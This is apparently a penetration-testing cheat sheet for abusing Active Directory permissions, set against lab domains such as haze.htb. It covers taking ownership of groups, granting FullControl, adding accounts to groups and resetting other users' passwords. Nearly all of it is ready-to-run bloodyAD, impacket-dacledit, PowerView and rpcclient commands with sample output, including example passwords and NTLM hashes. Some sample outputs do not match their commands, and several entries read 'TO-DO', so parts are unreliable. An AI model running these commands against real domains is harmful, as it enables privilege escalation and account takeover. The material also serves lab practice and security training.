Authentication Method
Change Owner of the Group/User
1. Change Owner
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
1. Connect
# Password
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Password-based Kerberos
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM-based Kerberos
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Ticket-based Kerberos
powerview '<DOMAIN>/<USER>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -k --no-pass
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
2. Change Owner
Set-DomainObjectOwner -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<TARGET_USER>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Set-DomainObjectOwner -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$'
[2025-10-31 21:39:34] [Set-DomainObjectOwner] Changing current owner S-1-5-21-323145914-28650650-2368316563-512 to S-1-5-21-323145914-28650650-2368316563-1111
[2025-10-31 21:39:34] [Set-DomainObjectOwner] Success! modified owner for CN=Support_Services,CN=Users,DC=haze,DC=htb
1. Import PowerView
. .\PowerView.ps1
Sample Output:
evil-winrm-py PS C:\programdata> . .\PowerView.ps1
2. Change Owner
Set-DomainObjectOwner -Identity '<TARGET_IDENTITY>' -OwnerIdentity '<TARGET_USER>'
Sample Output:
evil-winrm-py PS C:\programdata> Set-DomainObjectOwner -Identity 'SUPPORT_SERVICES' -OwnerIdentity 'haze-it-backup$'
Add User to the Group
1. Add Full Control to the User Over the Group
# Password
impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ impacket-dacledit 'haze.htb/haze-it-backup$:Password123!' -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-215454.bak
[*] DACL modified successfully!
# NTLM
impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ impacket-dacledit 'haze.htb/haze-it-backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-215454.bak
[*] DACL modified successfully!
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$:Password123!' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-220251.bak
[*] DACL modified successfully!
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-220251.bak
[*] DACL modified successfully!
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-220251.bak
[*] DACL modified successfully!
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
Add-DomainObjectAcl -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<USER>' -Rights fullcontrol
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol
[2025-10-31 22:15:34] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb
[2025-10-31 22:15:34] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
[2025-10-31 22:15:34] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112
[2025-10-31 22:15:34] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb
2. Add User to the Group
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
[2025-10-31 22:23:23] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112
[2025-10-31 22:23:23] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb
3. Check
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
Get-DomainGroupMember -Identity '<GROUP>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Get-DomainGroupMember -Identity 'Support_Services'
GroupDomainName : Support_Services
GroupDistinguishedName : CN=Support_Services,CN=Users,DC=haze,DC=htb
MemberDomain : haze.htb
MemberName : Haze-IT-Backup$
MemberDistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
MemberSID : S-1-5-21-323145914-28650650-2368316563-1111
1. Import PowerView.ps1
. .\PowerView.ps1
Sample Output:
evil-winrm-py PS C:\programdata> . .\PowerView.ps1
2. Add Full Control to the User Over the Group
Add-DomainObjectAcl -TargetIdentity '<GROUP>' -PrincipalIdentity '<USER>' -Rights All -DomainController <DC>
Sample Output:
evil-winrm-py PS C:\programdata> Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights All -DomainController dc01.haze.htb
4. Add User to the Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>' -Credential $cred
Sample Output:
evil-winrm-py PS C:\programdata> Add-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
5. Check
Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> -Credential $cred | fl MemberName
Sample Output:
evil-winrm-py PS C:\programdata> Get-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Domain haze.htb -DomainController dc01.haze.htb | fl MemberName
MemberName : Haze-IT-Backup$
Change Target User Password
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO
Ref: bloodyAD
# Password
rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <TARGET> -c 'setuserinfo2 <TARGET_USER> 23 <NEW_PASSWORD>'
Sample Output:
$ rpcclient -U 'object.local/oliver%c1cdfun_d2434' 10.10.11.132 -c 'setuserinfo2 smith 23 Password123!'
Set-ADAccountPassword -Identity "<TARGET_USER>" -NewPassword (ConvertTo-SecureString "<NEW_PASSWORD>" -AsPlainText -Force) -Reset
Sample Output:
TO-DO
1. Import PowerView
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
2. Change Target User Password
$password = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Sample Output:
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password
Sample Output:
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity gibdeon -AccountPassword $password